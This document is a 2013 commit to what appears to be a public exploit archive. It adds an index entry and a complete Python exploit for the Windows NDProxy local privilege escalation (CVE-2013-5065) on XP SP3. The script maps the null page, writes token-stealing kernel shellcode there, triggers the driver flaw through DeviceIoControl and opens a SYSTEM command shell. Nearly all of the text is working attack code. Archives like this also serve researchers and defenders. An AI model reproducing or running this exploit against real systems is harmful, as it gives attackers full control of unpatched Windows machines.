Updated 12_04_2013

2013-12-04 05:28:26 +00:00 · 2013-12-04 05:28:26 +00:00 · 2039e282e8
commit 2039e282e8
parent 18d0bd4ec0
2 changed files with 80 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -26963,3 +26963,4 @@ id,file,description,date,author,platform,type,port
 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0
 30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
+30014,platforms/windows/local/30014.py,"NDPROXY Local SYSTEM Privilege Escalation",2013-12-03,"Matteo Memelli",windows,local,0
--- a/platforms/windows/local/30014.py
+++ b/platforms/windows/local/30014.py
@ -0,0 +1,79 @@
+# NDPROXY Local SYSTEM privilege escalation
+# http://www.offensive-security.com
+# Tested on Windows XP SP3
+
+
+# Original crash ... null pointer dereference
+# Access violation - code c0000005 (!!! second chance !!!)
+# 00000038 ??              ???
+
+from ctypes import *
+from ctypes.wintypes import *
+import os, sys
+
+kernel32 = windll.kernel32
+ntdll = windll.ntdll
+
+GENERIC_READ     = 0x80000000
+GENERIC_WRITE    = 0x40000000
+FILE_SHARE_READ  = 0x00000001
+FILE_SHARE_WRITE = 0x00000002
+NULL = 0x0
+OPEN_EXISTING = 0x3
+PROCESS_VM_WRITE            = 0x0020
+PROCESS_VM_READ             = 0x0010
+MEM_COMMIT                  = 0x00001000
+MEM_RESERVE                 = 0x00002000
+MEM_FREE                    = 0x00010000
+PAGE_EXECUTE_READWRITE      = 0x00000040
+PROCESS_ALL_ACCESS          = 2097151
+FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000
+baseadd = c_int(0x00000001)
+MEMRES = (0x1000 | 0x2000)
+MEM_DECOMMIT = 0x4000
+PAGEEXE = 0x00000040
+null_size = c_int(0x1000)
+STATUS_SUCCESS = 0
+
+def log(msg):
+    print msg
+
+def getLastError():
+    """[-] Format GetLastError"""
+    buf = create_string_buffer(2048)
+    if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
+            kernel32.GetLastError(), 0,
+            buf, sizeof(buf), NULL):
+        log(buf.value)
+    else:
+        log("[-] Unknown Error")
+
+print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
+print "[*] Vulnerability found in the wild"
+print "[*] Coded by Offensive Security"       
+        
+tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24)
+InBuf = c_char_p(tmp)
+
+dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE)
+if dwStatus != STATUS_SUCCESS:
+    print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
+    getLastError()
+written = c_ulong()
+sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
+sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh))
+alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written))
+if alloc == 0:
+    print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
+    getLastError()
+
+dwRetBytes = DWORD(0)
+DEVICE_NAME   = "\\\\.\\NDProxy"
+hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None)
+if hdev == -1:
+	print "[-] Couldn't open the device... :("
+	sys.exit()
+kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0)
+kernel32.CloseHandle(hdev)
+print "[+] Spawning SYSTEM Shell..."
+os.system("start /d \"C:\\windows\\system32\" cmd.exe")